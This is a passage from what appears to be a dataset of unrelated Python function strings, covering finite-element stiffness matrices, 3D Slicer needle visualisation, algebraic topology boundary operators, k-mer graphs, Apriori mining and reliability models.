Ey*nu_xy*b**2*c**2/4 - Ey*b**4 + 7*G*nu_xy*nu_yx*b**2*c**2/5 - 7*G*b**2*c**2/5)/(b**3*c**3*(nu_xy*nu_yx - 1)), (Ex*nu_yx*c**2/2 + Ey*b**2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-Ex*c**2 - Ey*nu_xy*b**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), (5*Ex*nu_yx*b**2*c**2 + 20*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 - 10*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*c**2/2 + Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-Ex*c**2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1))],\n [(-Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (-5*Ey*b**2 + G*nu_xy*nu_yx*c**2 - G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (Ey*nu_xy*c**2/2 + Ey*b**2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 4*(-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), Ey*nu_xy/(nu_xy*nu_yx - 1), (-Ey*nu_xy*c**2/2 + Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - 
G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - 4*G*nu_xy*nu_yx*c**2 + 4*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0],\n [(Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, (-5*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), (Ex*nu_yx*b**2/2 - Ex*c**2/2 - G*nu_xy*nu_yx*b**2/5 + G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, -(10*Ex*c**2 + 8*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*b**2/2 - Ex*c**2 + G*nu_xy*nu_yx*b**2/5 - G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), Ex*nu_yx/(nu_xy*nu_yx - 1), 4*(-5*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), (Ex*c**2 - G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, -(10*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1))],\n [(5*Ex*nu_yx*b**2*c**2 - 10*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 + 20*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), (5*Ex*c**2 + 25*Ey*nu_xy*b**2 - 2*b**2*(15*Ey*nu_xy - G*nu_xy*nu_yx + G))/(10*b**2*c*(nu_xy*nu_yx - 1)), (-5*Ex*nu_yx*b**2*c**2 + 10*Ex*c**4 - 5*Ey*nu_xy*b**2*c**2 + 10*Ey*b**4 + 28*G*nu_xy*nu_yx*b**2*c**2 - 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), (5*Ex*nu_yx*b**2*c**2 + 20*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 - 10*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*c**2/2 + Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (Ex*c**2 - G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*b**2*c**2/4 - Ex*c**4 - Ey*nu_xy*b**2*c**2/4 - Ey*b**4 + 7*G*nu_xy*nu_yx*b**2*c**2/5 - 7*G*b**2*c**2/5)/(b**3*c**3*(nu_xy*nu_yx - 1)), (Ex*nu_yx*c**2/2 + Ey*b**2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (Ex*c**2 + Ey*nu_xy*b**2/2 - G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1))],\n [(-5*Ey*b**2 + G*nu_xy*nu_yx*c**2 - G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (-Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (-Ey*nu_xy*c**2/2 + Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - 4*G*nu_xy*nu_yx*c**2 + 4*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (Ey*nu_xy*c**2/2 + Ey*b**2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 4*(-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), -Ey*nu_xy/(nu_xy*nu_yx - 1)],\n [(-Ex*nu_yx*b**2/2 + Ex*c**2/2 + G*nu_xy*nu_yx*b**2/5 - G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, -(10*Ex*c**2 + 8*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), -(Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, (-5*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), (-Ex*c**2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, -(10*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), (Ex*nu_yx*b**2/2 + Ex*c**2 - G*nu_xy*nu_yx*b**2/5 + G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), -Ex*nu_yx/(nu_xy*nu_yx - 1), 4*(-5*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1))]])\n \n # Calculate the stiffness of a weak spring for the drilling degree of freedom (rotation\n # about local z). 
We'll set the weak spring to be 1000 times weaker than any of the other\n # rotational stiffnesses in the matrix.\n k_rz = min(abs(k[1, 1]), abs(k[2, 2]), abs(k[4, 4]), abs(k[5, 5]),\n abs(k[7, 7]), abs(k[8, 8]), abs(k[10, 10]), abs(k[11, 11])\n )/1000\n\n # The matrix currently only holds terms related to bending action. We need to expand it to\n # with placeholders for all the degrees of freedom so it can be directly added to the\n # membrane stiffness matrix later on.\n\n # Initialize the expanded stiffness matrix to all zeros\n k_exp = zeros((24, 24))\n\n # Step through each term in the unexpanded stiffness matrix\n\n # i = Unexpanded matrix row\n for i in range(12):\n\n # j = Unexpanded matrix column\n for j in range(12):\n \n # Find the corresponding term in the expanded stiffness\n # matrix\n\n # m = Expanded matrix row\n if i in [0, 3, 6, 9]: # indices associated with deflection in z\n m = 2*i + 2\n if i in [1, 4, 7, 10]: # indices associated with rotation about x\n m = 2*i + 1\n if i in [2, 5, 8, 11]: # indices associated with rotation about y\n m = 2*i\n\n # n = Expanded matrix column\n if j in [0, 3, 6, 9]: # indices associated with deflection in z\n n = 2*j + 2\n if j in [1, 4, 7, 10]: # indices associated with rotation about x\n n = 2*j + 1\n if j in [2, 5, 8, 11]: # indices associated with rotation about y\n n = 2*j\n \n # Ensure the indices are integers rather than floats\n m, n = round(m), round(n)\n\n # Add the term from the unexpanded matrix into the expanded\n # matrix\n k_exp[m, n] = k[i, j]\n \n # Add the drilling degree of freedom's weak spring\n k_exp[5, 5] = k_rz\n k_exp[11, 11] = k_rz\n k_exp[17, 17] = k_rz\n k_exp[23, 23] = k_rz\n \n # Return the local stiffness matrix\n return k_exp", "def drawValidationNeedles(self, nb=None):\r\n # productive #onButton\r\n profprint()\r\n # reset report table\r\n # print \"Draw manually segmented needles...\"\r\n # self.table =None\r\n # self.row=0\r\n widget = slicer.modules.NeedleFinderWidget\r\n if nb: widget.editNeedleTxtBox.value = nb\r\n widget.initTableView()\r\n self.deleteEvaluationNeedlesFromTable()\r\n while slicer.util.getNodes('manual-seg_'+str(widget.editNeedleTxtBox.value)) != {}:\r\n nodes = slicer.util.getNodes('manual-seg_'+str(widget.editNeedleTxtBox.value))\r\n for node in nodes.values():\r\n slicer.mrmlScene.RemoveNode(node)\r\n\r\n tableValueCtrPt = [[[999, 999, 999] for i in range(100)] for j in range(100)]\r\n modelNodes = slicer.mrmlScene.GetNodesByClass('vtkMRMLAnnotationFiducialNode')\r\n nbNode = modelNodes.GetNumberOfItems()\r\n for nthNode in range(nbNode):\r\n modelNode = slicer.mrmlScene.GetNthNodeByClass(nthNode, 'vtkMRMLAnnotationFiducialNode')\r\n modelNodeName = modelNode.GetName().strip('.')\r\n modelNodeName = modelNodeName.strip('\\r')\r\n if modelNode.GetName()[0] == '.' 
and len(modelNodeName.split('-')) == 2:\r\n needleNumber = int(modelNodeName.split('-')[0])\r\n needleStep = int(modelNodeName.split('-')[1])\r\n # if modelNode.GetAttribute(\"ValidationNeedle\") == \"1\":\r\n # needleNumber = int(modelNode.GetAttribute(\"NeedleNumber\"))\r\n if needleNumber == widget.editNeedleTxtBox.value:\r\n # needleStep = int(modelNode.GetAttribute(\"NeedleStep\"))\r\n coord = [0, 0, 0]\r\n modelNode.GetFiducialCoordinates(coord)\r\n tableValueCtrPt[needleNumber][needleStep] = coord\r\n print needleNumber, needleStep, coord\r\n # print self.tableValueCtrPt[needleNumber][needleStep]\r\n\r\n for i in range(len(tableValueCtrPt)):\r\n if not all(e == [999, 999, 999] for e in tableValueCtrPt[i]):\r\n # if self.tableValueCtrPt[i][1] != [999, 999, 999]:\r\n colorVar = random.randrange(50, 100, 1) # ??? /(100.)\r\n controlPointsUnsorted = [val for val in tableValueCtrPt[i] if val != [999, 999, 999]]\r\n controlPoints = self.sortTable(controlPointsUnsorted, (2, 1, 0))\r\n # print \"Control points unsorted\", controlPointsUnsorted\r\n print \"Control points\", controlPoints\r\n self.addNeedleToScene(controlPoints, i, 'Validation')\r\n self.observeManualNeedles()\r\n else:\r\n # print i\r\n pass\r\n self.findAxialSegmentationLimitFromMarker(bForceFallback=True) #AM force the presence of the limit marker\r", "def boundary_op_n(v):\r\n h = list(v.dic.keys())[0]\r\n p = len(h) - 1\r\n s = P_chains([],[])\r\n if (p != 0) and (isinstance(h, str) != True) and (isinstance(h, frozenset) != True) and (isinstance(h, ImmutableMatrix) != True):\r\n if (is_int(list(v.dic.keys())) == True):\r\n for u in v.dic.keys():\r\n c = 0\r\n for i in u: \r\n w = list(u)[:]\r\n w.remove(i)\r\n if (orientation_function(tuple(tuple_sorted(tuple(w))),tuple(w),p) == True):\r\n s1 = P_chains([tuple(tuple_sorted(tuple(w)))],[abs(v.dic[u])])\r\n if (np.sign((v.dic[u])*(-1)**c) < 0):\r\n s = s - s1\r\n else:\r\n s = s + s1\r\n c = c+1\r\n else:\r\n s1 = P_chains([tuple(tuple_sorted(tuple(w)))],[abs(v.dic[u])])\r\n if (np.sign((v.dic[u])*(-1)**(c+1)) < 0):\r\n s = s - s1\r\n else:\r\n s = s + s1\r\n c = c+1\r\n return s\r\n else:\r\n aux = P_chains([],[])\r\n D = {}\r\n ct = 0\r\n st = []\r\n for u in v.dic.keys():\r\n for x in u:\r\n if x not in st:\r\n st.append(x)\r\n for i in st:\r\n D[tuple([ct])] = i\r\n ct = ct + 1\r\n for u in v.dic.keys():\r\n w2 = []\r\n for x in u:\r\n for y in list(D.keys()):\r\n if (x == D[y]):\r\n w2.append(y)\r\n aux = aux + P_chains([tuple(w2)],[v.dic[u]]) \r\n v = aux\r\n for u in v.dic.keys():\r\n c = 0\r\n for i in u: \r\n w = list(u)[:]\r\n w.remove(i)\r\n if (orientation_function(tuple(tuple_sorted(tuple(w))),tuple(w),p) == True):\r\n s1 = P_chains([tuple(tuple_sorted(tuple(w)))],[abs(v.dic[u])])\r\n if (np.sign((v.dic[u])*(-1)**c) < 0):\r\n s = s - s1\r\n else:\r\n s = s + s1\r\n c = c+1\r\n else:\r\n s1 = P_chains([tuple(tuple_sorted(tuple(w)))],[abs(v.dic[u])])\r\n if (np.sign((v.dic[u])*(-1)**(c+1)) < 0):\r\n s = s - s1\r\n else:\r\n s = s + s1\r\n c = c+1\r\n s2 = P_chains([],[])\r\n for u in s.dic.keys():\r\n w2=[]\r\n for i in u:\r\n w2.append(D[i])\r\n s2 = s2 + P_chains([tuple(w2)],[s.dic[u]])\r\n \r\n return s2\r\n else:\r\n return s", "def build_knn(coords, k=6, **kwargs):\n \n tree = BallTree(coords, **kwargs)\n _, ind = tree.query(coords, k=k+1) # the first k is \"oneself\"\n pairs = pairs_from_knn(ind)\n return pairs", "def makekaryo(sp1chrom, sp2chrom, fai1, fai2):\n# import ipdb; ipdb.set_trace()\n fai1_name = fai1.split(\".\")[0]\n fai2_name = 
fai2.split(\".\")[0]\n fai_pair = \"{}-{}\".format(fai1_name, fai2_name)\n for fai in [fai1, fai2]:\n karyodict = {}\n with open(fai, 'r') as fai_l:\n for line in fai_l:\n x = line.strip().split()\n chrom = x[0]\n size = x[1]\n karyodict[chrom] = size\n if fai is fai1:\n fname = \"circos.{}.{}.karyotype.txt\".format(fai1_name, fai_pair)\n withchrom(fname, sp1chrom, karyodict)\n elif fai is fai2:\n fname = \"circos.{}.{}.karyotype.txt\".format(fai2_name, fai_pair)\n withchrom(fname, sp2chrom, karyodict)\n return(None)", "def test_find_long_chains(self):\n # a --> d --> j g h --> i\n # b _/ c --> e --> f\n self._build_sample_graph()\n # Adding singleton\n sg = self.skill_graph.add(Skill.build('g', ''))\n # Adding short path\n sh = self.skill_graph.add(Skill.build('h', ''))\n si = self.skill_graph.add(Skill.build('i', ''))\n self.skill_graph.add_prerequisite(si.id, sh.id)\n # Making path longer\n sj = self.skill_graph.add(Skill.build('j', ''))\n self.skill_graph.add_prerequisite(sj.id, self.sd.id)\n skill_map = SkillMap.load(self.course)\n result = SkillMapMetrics(skill_map).long_chains(2)\n expected = [\n [self.sa.id, self.sd.id, sj.id],\n [self.sb.id, self.sd.id, sj.id],\n [self.sc.id, self.se.id, self.sf.id]\n ]\n self.assertEqual(sorted(expected), sorted(result))", "def test_split_orphan(self):\r\n orphans = self.split_mongo.get_orphans(self.split_course_key)\r\n self.assertEqual(len(orphans), 3, \"Wrong # {}\".format(orphans))\r\n location = self.split_course_key.make_usage_key('chapter', 'OrphanChapter')\r\n self.assertIn(location, orphans)\r\n location = self.split_course_key.make_usage_key('vertical', 'OrphanVert')\r\n self.assertIn(location, orphans)\r\n location = self.split_course_key.make_usage_key('html', 'OrphanHtml')\r\n self.assertIn(location, orphans)", "def test_fk():\n\n joints = [0.0, 2.9, 1.3, 4.2, 1.4, 0.0]\n\n path_planner = PathPlanner(\"manipulator\")\n\n pose = path_planner.get_fk(joints)\n\n print pose", "def create_Ck(Lksub1, k):\r\n Ck = set()\r\n len_Lksub1 = len(Lksub1)\r\n list_Lksub1 = list(Lksub1)\r\n for i in range(len_Lksub1):\r\n for j in range(1, len_Lksub1):\r\n l1 = list(list_Lksub1[i])\r\n l2 = list(list_Lksub1[j])\r\n l1.sort()\r\n l2.sort()\r\n if l1[0:k-2] == l2[0:k-2]:\r\n Ck_item = list_Lksub1[i] | list_Lksub1[j]\r\n # pruning\r\n if is_apriori(Ck_item, Lksub1):\r\n Ck.add(Ck_item)\r\n return Ck", "def InertiaBranch(fkList, massList, mInertList, jParams):\n hList = [LinkInertia(fkList[i], massList[i], mInertList[i], jParams) for i in range(len(massList))]\n H = reduce(lambda h1, h2: h1 + h2, hList)\n return csd.simplify(H)", "def discretizeSecondMember (bsp, knotlist,p, nbquadrature):\n\tF = np.zeros(bsp.N-2)\n\tfor i in range(1, bsp.N-1): #i est l'indice des Ni\n\t\t\n\t\t\n\t\t# on regarde sur tous les knots pour chaque Ni\n\t\tfor iknot in range(len(knotlist)-1):\n\t\t\t\n\t\t\tF[i-1] = F[i-1] + legendreGauss(secondMember, nbquadrature, knotlist[iknot], knotlist[iknot+1], i, bsp)\n\t\t\t\t\t\n\treturn F;", "def test_kn(size):\n graph = Graph()\n for one in range(size):\n for two in range(one + 1, size):\n graph.add_edge(one, two)\n eq_(size-1, graph.approx_treewidth())", "def kchainbasis(h, k):\n\n import itertools as it\n kchains = set()\n for e in h.edges():\n if len(e) == k + 1:\n kchains.add(tuple(sorted(e.uidset)))\n elif len(e) > k + 1:\n kchains.update(set(it.combinations(sorted(e.uidset), k + 1)))\n return sorted(list(kchains))", "def makeB2TwoDetachedDimuons(name,config,inputSel) :\n # define cuts on B object\n wm = 
['in_range(%s,AM,%s)' % (config['MASS_MIN']['B'],\n config['MASS_MAX']['B'])]\n wm = '('+('|'.join(wm))+')'\n comboCuts = [LoKiCuts(['SUMPT'],config).code(),wm]\n comboCuts = LoKiCuts.combine(comboCuts)\n momCuts = LoKiCuts(['VCHI2DOF','BPVVDCHI2','BPVIPCHI2','BPVDIRA'], \n config).code()\n B2KSKS = CombineParticles(\"Combine\"+name)\n B2KSKS.DecayDescriptor = 'B0 -> KS0 KS0'\n B2KSKS.CombinationCut = comboCuts\n B2KSKS.MotherCut = momCuts\n \n return Selection(name,\n Algorithm = B2KSKS,\n RequiredSelections = inputSel)", "def test_find_long_chains_multiple(self):\n # a -> b -> c -> ... x\n # \\________________/\n self.skill_graph = SkillGraph.load()\n old_skill = self.skill_graph.add(Skill.build('o', ''))\n last_skill = self.skill_graph.add(Skill.build('l', ''))\n self.skill_graph.add_prerequisite(last_skill.id, old_skill.id)\n chain_ids = [old_skill.id]\n for index in range(CHAINS_MIN_LENGTH):\n new_skill = self.skill_graph.add(Skill.build(str(index), ''))\n chain_ids.append(new_skill.id)\n self.skill_graph.add_prerequisite(new_skill.id, old_skill.id)\n old_skill = new_skill\n self.skill_graph.add_prerequisite(old_skill.id, last_skill.id)\n skill_map = SkillMap.load(self.course)\n result = SkillMapMetrics(skill_map).long_chains()\n self.assertEqual([chain_ids], result)", "def rbd2_koon() -> NonRepairableRBD:\n edges = [(1, 2), (2, 3), (2, 4), (4, 7), (3, 5), (5, 6), (6, 7), (7, 8)]\n reliabilities = {\n 2: surv.Weibull.from_params([20, 2]),\n 3: surv.Weibull.from_params([100, 3]),\n 4: surv.Weibull.from_params([50, 20]),\n 5: surv.Weibull.from_params([15, 1.2]),\n 6: surv.Weibull.from_params([80, 10]),\n 7: StandbyModel(\n [\n surv.Weibull.from_params([5, 1.1]),\n surv.Weibull.from_params([5, 1.1]),\n surv.Weibull.from_params([5, 1.1]),\n surv.Weibull.from_params([5, 1.1]),\n ]\n ),\n }\n k = {7: 2}\n return NonRepairableRBD(edges, reliabilities, k)", "def create_Ck(Lksub1, k):\n Ck = set()\n len_Lksub1 = len(Lksub1)\n Lksub = list(Lksub1)\n for i in range(len_Lksub1):\n for j in range(1, len_Lksub1):\n l1 = list(Lksub[i])\n l2 = list(Lksub[j])\n l1.sort()\n l2.sort()\n if l1[0:k-2] == l2[0:k-2]:\n Ck_item = Lksub[i] | Lksub[j]\n # pruning\n if is_apriori(Ck_item, Lksub1):\n Ck.add(Ck_item)\n return Ck", "def bkMatrix(km1basis, kbasis):\n bk = np.zeros((len(km1basis), len(kbasis)), dtype=int)\n for cell in kbasis:\n for idx in range(len(cell)):\n face = cell[:idx] + cell[idx + 1:]\n row = km1basis.index(face)\n col = kbasis.index(cell)\n bk[row, col] = 1\n return bk", "def create_balanced(self, k, dim):\n j = (1.0 - k) / (dim - 1)\n self.m = []\n for index in range(dim):\n row = [j] * dim\n row[index] = k\n self.m.append(row)\n self.num_states = dim\n self.convert_to_measure_matrix()\n pprint(self.m)", "def build_karels():\n build_karel1()\n build_karel2()\n build_karel3()\n build_karel4()", "def slot_avaialble(application, approved_loans, K):\n return len(intersected_applications(application, approved_loans)) < K", "def constructAdjacencies(self, seq):\n prev = seq[:self.kmer_size].upper()\n prev_strandless = strandless(prev)\n for i in xrange(1, len(seq) - self.kmer_size + 1):\n prev_size = len(self.G)\n kmer = seq[i:i + self.kmer_size].upper()\n if \"N\" in kmer or \"N\" in prev:\n continue\n kmer_strandless = strandless(kmer)\n if prev == prev_strandless:\n # exiting right side of previous kmer\n if kmer == kmer_strandless:\n # entering left side of next kmer\n self.G.add_edge(prev + \"_R\", kmer + \"_L\")\n else:\n # entering right side of next kmer\n self.G.add_edge(prev + \"_R\", 
reverseComplement(kmer) + \"_R\")\n else:\n # exiting left side of previous kmer\n if kmer == kmer_strandless:\n # entering left side of next kmer\n self.G.add_edge(reverseComplement(prev) + \"_L\", kmer + \"_L\")\n else:\n # entering right side of next kmer\n self.G.add_edge(reverseComplement(prev) + \"_L\", reverseComplement(kmer) + \"_R\")\n assert prev_size == len(self.G)\n prev = kmer\n prev_strandless = kmer_strandless", "def allocate_candies(A, k):\n lo = 0\n\n # the maximum number of candies we could theoretically allocate\n # to each children (if we ignored piles)\n hi = sum(A) // k\n\n while lo < hi:\n mid = (lo + hi + 1) // 2\n\n # n is the maximum number of children that can get a pile of candies\n # of size mid\n n = 0\n for pile in A:\n n += pile // mid\n\n # if we can feed more children than expected, we could give less\n # more candies to each children\n if n >= k:\n lo = mid\n\n # we are trying to give too many candies per children\n else:\n hi = mid - 1\n\n return lo", "def get_2away_pairs(local_index_to_kmer, k):\n\n #These are the base cases for the recursion. If k==1, the kmers obviously can't differ in exactly two bases, so return an empty list. if k==2, return every pair of indices where the kmers at those indices differ at exactly two bases.\n if k == 1:\n return []\n if k == 2:\n return [(i, j) for (i,j) in combinations(local_index_to_kmer, 2) if local_index_to_kmer[i][0] != local_index_to_kmer[j][0] and local_index_to_kmer[i][1] != local_index_to_kmer[j][1]]\n\n #Get the two halves of the kmer\n k_L = k//2\n k_R = k-k_L\n\n #initialize dictionaries in which the key is the hash of half of the kmer, and the value is a list of indices of the kmers with that same hash\n kmer_L_hashes = defaultdict(list)\n kmer_R_hashes = defaultdict(list)\n\n #initialize pairs, which will be returned by get_1away_pairs\n pairs = []\n\n #initialize dictionaries containing the left halves and the right halves (since we will have to check cases where the left half differs by 1 and the right half differs by 1)\n local_index_to_kmer_L = {}\n local_index_to_kmer_R = {}\n\n #for each kmer, calculate its left hash and right hash, then add its index to the corresponding entries of the dictionary\n for i, kmer in local_index_to_kmer.items():\n kmer_L = kmer[:k_L]\n kmer_R = kmer[k_L:]\n local_index_to_kmer_L[i] = kmer_L\n local_index_to_kmer_R[i] = kmer_R\n kmer_L_hashes[kmer_to_int(kmer_L)] += [i]\n kmer_R_hashes[kmer_to_int(kmer_R)] += [i]\n\n #for each left hash in which there are multiple kmers with that left hash, find the list of pairs in which the right half differs by 2. (aka, if left half matches, recurse on right half).\n for kmer_L_hash_indices in kmer_L_hashes.values(): #same in first half\n if len(kmer_L_hash_indices) > 1:\n pairs += get_2away_pairs({kmer_L_hash_index:local_index_to_kmer[kmer_L_hash_index][k_L:] for kmer_L_hash_index in kmer_L_hash_indices}, k_R) #differ by 2 in right half\n\n #for each right hash in which there are multiple kmers with that right hash, find the list of pairs in which the left half differs by 2. 
(aka, if right half matches, recurse on left half).\n for kmer_R_hash_indices in kmer_R_hashes.values(): #same in second half\n if len(kmer_R_hash_indices) > 1:\n pairs += get_2away_pairs({kmer_R_hash_index:local_index_to_kmer[kmer_R_hash_index][:k_L] for kmer_R_hash_index in kmer_R_hash_indices}, k_L) #differ by 2 in left half\n\n #Find matching pairs where the left half is one away, and the right half is one away\n possible_pairs_L = set(get_1away_pairs(local_index_to_kmer_L,k_L))\n possible_pairs_R = set(get_1away_pairs(local_index_to_kmer_R,k_R))\n pairs += list(possible_pairs_L.intersection(possible_pairs_R))\n return(pairs)", "def boundary(self):\n\n answer = self.zero()\n if self.torsion == 2:\n for k in self.keys():\n for idx in range(0, len(k)):\n bdry_summand = k[:idx] + k[idx + 1:]\n if k[idx] in bdry_summand:\n answer += self.create({bdry_summand: 1})\n return answer\n if self.convention == 'Berger-Fresse':\n for k, v in self.items():\n # determining the signs of the summands\n signs = {}\n alternating_sign = 1\n for idx, i in enumerate(k):\n if i in k[idx + 1:]:\n signs[idx] = alternating_sign\n alternating_sign *= (-1)\n elif i in k[:idx]:\n occurs = (pos for pos, j in enumerate(k[:idx]) if i == j)\n signs[idx] = signs[max(occurs)] * (-1)\n else:\n signs[idx] = 0\n # computing the summands\n for idx in range(0, len(k)):\n bdry_summand = k[:idx] + k[idx + 1:]\n if k[idx] in bdry_summand:\n answer += self.create({bdry_summand: signs[idx] * v})\n if self.convention == 'McClure-Smith':\n for k, v in self.items():\n sign = 1\n for i in range(1, max(k) + 1):\n for idx in (idx for idx, j in enumerate(k) if j == i):\n new_k = k[:idx] + k[idx + 1:]\n if k[idx] in new_k:\n answer += answer.create({new_k: v * sign})\n sign *= -1\n sign *= -1\n return answer", "def kmodels(wordlen: int, k: int, input=None, output=None):\n\n assert 0 <= k < 2**wordlen\n if output is None:\n output = _fresh()\n\n if input is None:\n input = _fresh()\n\n imap, omap = BundleMap({input: wordlen}), BundleMap({output: 1})\n atoms = map(aiger.atom, imap[input])\n\n active = False\n expr = aiger.atom(False)\n for atom, bit in zip(atoms, encode_int(wordlen, k, signed=False)):\n active |= bit\n if not active: # Skip until first 1.\n continue\n expr = (expr | atom) if bit else (expr & atom)\n\n aig = expr.aig['o', {expr.output: omap[output][0]}]\n aig |= aiger.sink(imap[input])\n return aigbv.AIGBV(imap=imap, omap=omap, aig=aig)", "def beam(t, n, height):\n hollow(t, n*height)\n fdbk(t, n)\n hollow(t, -n*height)", "def test_weyl_specialize_id(self):\n a, b, c = 0.0, 0.0, 0.0\n for da, db, dc in DELTAS:\n for k1l, k1r, k2l, k2r in K1K2SB:\n k1 = np.kron(k1l.data, k1r.data)\n k2 = np.kron(k2l.data, k2r.data)\n self.check_two_qubit_weyl_specialization(\n k1 @ Ud(a + da, b + db, c + dc) @ k2,\n 0.999,\n TwoQubitWeylIdEquiv,\n {\"rz\": 4, \"ry\": 2},\n )", "def __init__(self, k=2):\n assert k >= 2\n self.k = k", "def make_mammalian_n_glycan_neighborhoods():\n neighborhoods = NeighborhoodCollection()\n\n _neuraminic = \"(%s)\" % ' + '.join(map(str, (\n FrozenMonosaccharideResidue.from_iupac_lite(\"NeuAc\"),\n FrozenMonosaccharideResidue.from_iupac_lite(\"NeuGc\")\n )))\n _terminal = _neuraminic + \\\n \" + max(%s - %%d, 0)\" % FrozenMonosaccharideResidue.from_iupac_lite(\"Hex\")\n _hexose = \"(%s)\" % ' + '.join(\n map(str, map(FrozenMonosaccharideResidue.from_iupac_lite, ['Hex', ])))\n _hexnac = \"(%s)\" % ' + '.join(\n map(str, map(FrozenMonosaccharideResidue.from_iupac_lite, ['HexNAc', ])))\n\n high_mannose = 
CompositionRangeRule(\n _hexose, 3, 12) & CompositionRangeRule(\n _hexnac, 2, 2) & CompositionRangeRule(\n _neuraminic, 0, 0)\n high_mannose.name = \"high-mannose\"\n neighborhoods.add(high_mannose)\n\n base_hexnac = 3\n base_terminal_groups = 2\n for i, spec in enumerate(['hybrid', 'bi', 'tri', 'tetra', 'penta', \"hexa\", \"hepta\"]):\n if spec == 'hybrid':\n rule = CompositionRangeRule(\n _hexnac, base_hexnac - 1, base_hexnac + 1\n ) & CompositionRangeRule(\n _neuraminic, 0, base_terminal_groups) & CompositionRangeRule(\n _hexose, base_hexnac + i - 1,\n base_hexnac + i + 3)\n rule.name = spec\n neighborhoods.add(rule)\n else:\n sialo = CompositionRangeRule(\n _hexnac, base_hexnac + i - 1, base_hexnac + i + 1\n ) & CompositionRangeRule(\n (_neuraminic), 1, base_terminal_groups + i\n ) & CompositionExpressionRule(\n \"(Hex > 